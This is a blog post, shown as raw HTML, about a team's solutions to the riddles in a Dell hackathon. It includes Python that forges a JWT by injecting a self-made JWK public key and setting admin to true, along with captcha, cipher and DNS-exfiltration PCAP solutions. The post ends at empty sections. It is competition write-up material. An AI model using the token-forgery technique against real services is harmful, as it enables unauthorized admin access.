<!DOCTYPE html>


























<html
  class="not-ready text-sm lg:text-base"
  style="--bg: #faf6f1"
  lang="en-us"
>
  <head>
  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta
    name="viewport"
    content="width=device-width, initial-scale=1, shrink-to-fit=no"
  />

  
  <title>HackTrick23 Journey - My Blog</title>

  
  <meta name="theme-color" />

  
  
  
  <meta name="description" content="Welcome&hellip; That&rsquo;s our short journey with Hacktrick this year be ready for some useful information and a lot of drama. First what is hacktrick??
Hacktrick is a hackathon organized by Dell that took place in Egypt. The hackathon aimed to bring together young innovators and developers to work on real-world challenges and create innovative solutions using technology.
This year the hackathon was about AI, cybercecurity and optimization, the problem in short is that you enter a maze (10*10) at the top left corner and the exit is at bottom right corner inside the maze there are 4 children you want to rescue, to rescue a child you need to solve a riddle and the score depends on the number of children you rescued, how many steps you took, and the time to solve the riddles and there is a rule that if you didn&rsquo;t exit at the bottom right corner you will get only 80% of the score finalyy you have 5 submissions and your best one is taken into account." />
  <meta name="author" content="My Blog" />
  

  
  
  
  
  
  
  <link rel="preload stylesheet" as="style" href="http://ThisIsSalama.github.io/main.min.css" />

  
  <script
    defer
    src="http://ThisIsSalama.github.io/highlight.min.js"
    onload="hljs.initHighlightingOnLoad();"
  ></script>
  

  
   
  <link rel="preload" as="image" href="http://ThisIsSalama.github.io/theme.png" />

  
  
  
  

  

  
  <link rel="icon" href="http://ThisIsSalama.github.io/favicon.ico" />
  <link rel="apple-touch-icon" href="http://ThisIsSalama.github.io/apple-touch-icon.png" />

  
  <meta name="generator" content="Hugo 0.111.3">

  
  

  
  
  
  
  
  
  
  <meta property="og:title" content="HackTrick23 Journey" />
<meta property="og:description" content="Welcome&hellip; That&rsquo;s our short journey with Hacktrick this year be ready for some useful information and a lot of drama. First what is hacktrick??
Hacktrick is a hackathon organized by Dell that took place in Egypt. The hackathon aimed to bring together young innovators and developers to work on real-world challenges and create innovative solutions using technology.
This year the hackathon was about AI, cybercecurity and optimization, the problem in short is that you enter a maze (10*10) at the top left corner and the exit is at bottom right corner inside the maze there are 4 children you want to rescue, to rescue a child you need to solve a riddle and the score depends on the number of children you rescued, how many steps you took, and the time to solve the riddles and there is a rule that if you didn&rsquo;t exit at the bottom right corner you will get only 80% of the score finalyy you have 5 submissions and your best one is taken into account." />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://ThisIsSalama.github.io/posts/hacktrick23_journey/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2023-03-16T09:57:49+02:00" />
<meta property="article:modified_time" content="2023-03-16T09:57:49+02:00" />

  
  <meta itemprop="name" content="HackTrick23 Journey">
<meta itemprop="description" content="Welcome&hellip; That&rsquo;s our short journey with Hacktrick this year be ready for some useful information and a lot of drama. First what is hacktrick??
Hacktrick is a hackathon organized by Dell that took place in Egypt. The hackathon aimed to bring together young innovators and developers to work on real-world challenges and create innovative solutions using technology.
This year the hackathon was about AI, cybercecurity and optimization, the problem in short is that you enter a maze (10*10) at the top left corner and the exit is at bottom right corner inside the maze there are 4 children you want to rescue, to rescue a child you need to solve a riddle and the score depends on the number of children you rescued, how many steps you took, and the time to solve the riddles and there is a rule that if you didn&rsquo;t exit at the bottom right corner you will get only 80% of the score finalyy you have 5 submissions and your best one is taken into account."><meta itemprop="datePublished" content="2023-03-16T09:57:49+02:00" />
<meta itemprop="dateModified" content="2023-03-16T09:57:49+02:00" />
<meta itemprop="wordCount" content="889">
<meta itemprop="keywords" content="" />
  
  <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="HackTrick23 Journey"/>
<meta name="twitter:description" content="Welcome&hellip; That&rsquo;s our short journey with Hacktrick this year be ready for some useful information and a lot of drama. First what is hacktrick??
Hacktrick is a hackathon organized by Dell that took place in Egypt. The hackathon aimed to bring together young innovators and developers to work on real-world challenges and create innovative solutions using technology.
This year the hackathon was about AI, cybercecurity and optimization, the problem in short is that you enter a maze (10*10) at the top left corner and the exit is at bottom right corner inside the maze there are 4 children you want to rescue, to rescue a child you need to solve a riddle and the score depends on the number of children you rescued, how many steps you took, and the time to solve the riddles and there is a rule that if you didn&rsquo;t exit at the bottom right corner you will get only 80% of the score finalyy you have 5 submissions and your best one is taken into account."/>

  
  
</head>

  <body class="text-black duration-200 ease-out dark:text-white">
    <header class="mx-auto flex h-[5rem] max-w-3xl px-8 lg:justify-center">
  <div class="relative z-50 mr-auto flex items-center">
    <a
      class="-translate-x-[1px] -translate-y-0.5 text-3xl font-bold"
      href="http://ThisIsSalama.github.io/"
      >My Blog</a
    >
    <div
      class="btn-dark text-[0] ml-6 h-6 w-6 shrink-0 cursor-pointer [background:url(./theme.png)_left_center/_auto_theme('spacing.6')_no-repeat] [transition:_background-position_0.4s_steps(5)] dark:[background-position:right]"
      role="button"
      aria-label="Dark"
    ></div>
  </div>

  <div
    class="btn-menu relative z-50 -mr-8 flex h-[5rem] w-[5rem] shrink-0 cursor-pointer flex-col items-center justify-center gap-2.5 lg:hidden"
    role="button"
    aria-label="Menu"
  ></div>

  
  <script>
    
    const htmlClass = document.documentElement.classList;
    setTimeout(() => {
      htmlClass.remove('not-ready');
    }, 10);

    
    const btnMenu = document.querySelector('.btn-menu');
    btnMenu.addEventListener('click', () => {
      htmlClass.toggle('open');
    });

    
    const metaTheme = document.querySelector('meta[name="theme-color"]');
    const lightBg = `"#faf6f1"`.replace(/"/g, '');
    const setDark = (isDark) => {
      metaTheme.setAttribute('content', isDark ? '#000' : lightBg);
      htmlClass[isDark ? 'add' : 'remove']('dark');
      localStorage.setItem('dark', isDark);
    };

    
    const darkScheme = window.matchMedia('(prefers-color-scheme: dark)');
    if (htmlClass.contains('dark')) {
      setDark(true);
    } else {
      const darkVal = localStorage.getItem('dark');
      setDark(darkVal ? darkVal === 'true' : darkScheme.matches);
    }

    
    darkScheme.addEventListener('change', (event) => {
      setDark(event.matches);
    });

    
    const btnDark = document.querySelector('.btn-dark');
    btnDark.addEventListener('click', () => {
      setDark(localStorage.getItem('dark') !== 'true');
    });
  </script>

  <div
    class="nav-wrapper fixed inset-x-0 top-full z-40 flex h-full select-none flex-col justify-center pb-16 duration-200 dark:bg-black lg:static lg:h-auto lg:flex-row lg:!bg-transparent lg:pb-0 lg:transition-none"
  >
    
    

    
  </div>
</header>


    <main
      class="prose prose-neutral relative mx-auto min-h-[calc(100%-10rem)] max-w-3xl px-8 pt-16 pb-24 dark:prose-invert"
    >
      

<article>
  <header class="mb-20">
    <h1 class="!my-0 pb-2.5">HackTrick23 Journey</h1>

    
    <div class="text-sm opacity-50">
      
      <time>Mar 16, 2023</time>
      
      
      
      
    </div>
    
  </header>

  <section><h1 id="welcome">Welcome&hellip;</h1>
<p>That&rsquo;s our short journey with Hacktrick this year be ready for some useful information and a lot of drama.
First what is hacktrick??<br>
Hacktrick is a hackathon organized by Dell that took place in Egypt. The hackathon aimed to bring together young innovators and developers to work on real-world challenges and create innovative solutions using technology.<br>
This year the hackathon was about AI, cybercecurity and optimization, the problem in short is that you enter a maze (10*10) at the top left corner and the exit is at bottom right corner inside the maze there are 4 children you want to rescue, to rescue a child you need to solve a riddle and the score depends on the number of children you rescued, how many steps you took, and the time to solve the riddles and there is a rule that if you didn&rsquo;t exit at the bottom right corner you will get only 80% of the score finalyy you have 5 submissions and your best one is taken into account.
So intintuitively your aim was to rescue the largest number of children in the least number of steps.
You can make many approaches for this problem like RL and Informed search, we will talk about our approach later.<br>
<a href="https://github.com/HackTrick23/HackTrick23">for the official documentation here.</a></p>
<h1 id="riddles">Riddles&hellip;</h1>
<p>Let&rsquo;s talk about the riddles firstly, there was 4 types of riddles each has a different weight (captcha=10, cipher=20, server=30, PCAP=40) To be honest the riddles difficulity level was disappointing they mostly depended on if you know base64 encoding or not, at our preperation for the hackathon we expected more than that.<br>
in the next few lines i will show snippets of code for out team &ldquo;code of duty&rdquo; and our friends team &ldquo;respectively&rdquo; you will know the reason for that in the DRAMA part stay tuned.</p>
<h2 id="captcha">Captcha</h2>
<p>You are given an amazon captcha in the form of 2d list and the target is to return the text inside it.<br>
solving it literrally took from us 2 lines of code using easyOCR open library which depends on pytorch an easier library was amazon captcha and it needs 2 lines of code too.</p>
<h3 id="code-of-duty-approach">code of duty approach:</h3>
<pre tabindex="0"><code>def captcha_solver(question):
    reader = easyocr.Reader([&#39;en&#39;])
    result = reader.readtext(np.array(question, dtype=np.uint8))
    return result[0][1]
</code></pre><h3 id="respectively-approach">respectively approach:</h3>
<pre tabindex="0"><code>def captcha_solver(question):
    img_bytes = BytesIO()
    img = Image.fromarray(np.array(question).astype(&#39;uint8&#39;))
    img.save(img_bytes, format=&#39;JPEG&#39;)
    captcha = AmazonCaptcha(img_bytes)
    captcha.img = img
    solution = captcha.solve()
    return solution
</code></pre><h2 id="cipher">Cipher</h2>
<p>You are given message which was altered after it was ciphered and you need to return the original message.<br>
if you just noticed the it was altered just by encoding it base64 you are done with it, after decoding it it gives you the nessage in binary with the shift and you can solve it with normal Caesar cipher.</p>
<h2 id="code-of-duty-approach-1">code of duty approach:</h2>
<p>we have a class to implement addpadding, getMessage functions</p>
<pre tabindex="0"><code>def cipher_solver(question):
    text = addpadding(question)
    binary = base64.decodebytes(text)
    binaryStr = str(binary)[3:-2]
    msg, shift = binaryStr.split(&#34;,&#34;)
    shift = int(shift, 2)
    return getMessage(msg, shift)
</code></pre><h2 id="respectively-approach-1">respectively approach:</h2>
<pre tabindex="0"><code>def cipher_solver(question):
    padding = 4 - len(question) % 4
    question += &#34;=&#34; * padding
    decoded = base64.b64decode(question).decode(&#34;utf-8&#34;)
    cipherBits, shiftBits = decoded.split(&#39;,&#39;)
    shift = int(shiftBits[:-1], 2)
    cipherBits = cipherBits[1:]

    capital = [&#39;A&#39;, &#39;B&#39;, &#39;C&#39;, &#39;D&#39;, &#39;E&#39;, &#39;F&#39;, &#39;G&#39;, &#39;H&#39;, &#39;I&#39;, &#39;J&#39;, &#39;K&#39;, &#39;L&#39;, &#39;M&#39;, &#39;N&#39;, &#39;O&#39;, &#39;P&#39;, &#39;Q&#39;, &#39;R&#39;, &#39;S&#39;, &#39;T&#39;, &#39;U&#39;,
               &#39;V&#39;, &#39;W&#39;, &#39;X&#39;, &#39;Y&#39;, &#39;Z&#39;]
    small = [&#39;a&#39;, &#39;b&#39;, &#39;c&#39;, &#39;d&#39;, &#39;e&#39;, &#39;f&#39;, &#39;g&#39;, &#39;h&#39;, &#39;i&#39;, &#39;j&#39;, &#39;k&#39;, &#39;l&#39;, &#39;m&#39;, &#39;n&#39;, &#39;o&#39;, &#39;p&#39;, &#39;q&#39;, &#39;r&#39;, &#39;s&#39;, &#39;t&#39;, &#39;u&#39;,
             &#39;v&#39;, &#39;w&#39;, &#39;x&#39;, &#39;y&#39;, &#39;z&#39;]

    solution = &#34;&#34;
    for i in range(len(cipherBits) // 7):
        num = int(cipherBits[i * 7:(i + 1) * 7], 2)
        num = num % 128
        index = (ord(chr(num).lower()) - 97) - shift

        if num &gt; 96:  # small
            solution += small[index]
        else:  # capital
            solution += capital[index]

    return solution
</code></pre><h2 id="server">Server</h2>
<p>Ok honstly that problem took from us a lot much than it deserve.
you are given a jwt token which was signed with a private key and you to verify it you must decode that sign by a public key, the trick was that the public key used for vervication wwas send in he header of the token, so the solution wan simply through out this public key change what you need in the token and sign it with any private key and send with the header your public key.</p>
<h2 id="code-of-duty-approach-2">code of duty approach:</h2>
<p>the public and privates keys were generated previously and loaded from a file.</p>
<pre tabindex="0"><code>def server_solver(question):
    decoded_payload = jwt.decode(question, options={&#34;verify_signature&#34;: False})
    decoded_header = jwt.get_unverified_header(question)

    decoded_header[&#39;jwk&#39;][&#39;e&#39;] = _encode64Int(public_key.public_numbers().e)
    decoded_header[&#39;jwk&#39;][&#39;n&#39;] = _encode64Int(public_key.public_numbers().n)
    decoded_payload[&#39;admin&#39;] = &#34;true&#34;
    jwt_token = jwt.encode(decoded_payload, private_key, algorithm=&#34;RS256&#34;, headers=decoded_header)
</code></pre><h2 id="respectively-approach-2">respectively approach:</h2>
<pre tabindex="0"><code>def server_solver(question):
    payload = jwt.decode(question, options={&#34;verify_signature&#34;: False}, algorithms=[&#34;RS256&#34;])
    payload[&#39;admin&#39;] = &#34;true&#34;

    private_key = rsa.generate_private_key(
        public_exponent=65537,
        key_size=2048,
    )

    # Serialize the private key to PEM format
    pem_private_key = private_key.private_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PrivateFormat.PKCS8,
        encryption_algorithm=serialization.NoEncryption(),
    )

    # Generate the public key from the private key
    public_key = private_key.public_key()

    # Serialize the public key to PEM format
    pem_public_key = public_key.public_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PublicFormat.SubjectPublicKeyInfo,
    )

    jwk_public_key = jwk.JWK.from_pem(pem_public_key)

    new_token = jwt.encode(payload, key=pem_private_key, algorithm=&#39;RS256&#39;, headers={&#39;jwk&#39;: jwk_public_key,
                                                                                     &#39;kid&#39;: jwk_public_key[&#34;kid&#34;]})

    return new_token
</code></pre><h2 id="pcap">PCAP</h2>
<p>giving a pcap file, and you know that the server was DNS exfilterated from a specific IP you need to get what information was leaked.
just filter the packets with the IP again decode the subdomains with base64 and that&rsquo;s it.</p>
<pre tabindex="0"><code>    dns_packets = filter(lambda pkt: DNS in pkt and pkt[IP].dst == &#39;188.68.45.12&#39;, packets)
    
</code></pre><h2 id="respectively-approach-3">respectively approach:</h2>
<h1 id="maze-solver">Maze Solver&hellip;</h1>
</section>

  
  

  
  
  
  <nav class="mt-24 flex rounded-lg bg-black/[3%] text-lg dark:bg-white/[8%]">
    
    <a
      class="flex w-1/2 items-center rounded-l-md p-6 pr-3 no-underline hover:bg-black/[2%] dark:hover:bg-white/[3%]"
      href="http://ThisIsSalama.github.io/posts/me/"
      ><span class="mr-1.5">←</span><span>Me</span></a
    >
    
    
  </nav>
  

  
  

  
  
</article>


    </main>

    <footer
  class="opaco mx-auto flex h-[5rem] max-w-3xl items-center px-8 text-[0.9em] opacity-50"
>
  <div class="mr-auto">
    &copy; 2023
    <a class="link" href="http://ThisIsSalama.github.io/">My Blog</a>
  </div>
  <a class="link mx-6" href="https://gohugo.io/" rel="noopener" target="_blank"
    >Powered by Hugo️️</a
  >️
  <a
    class="link"
    href="https://github.com/nanxiaobei/hugo-paper"
    rel="noopener"
    target="_blank"
    >Theme Paper</a
  >
</footer>

  </body>
</html>
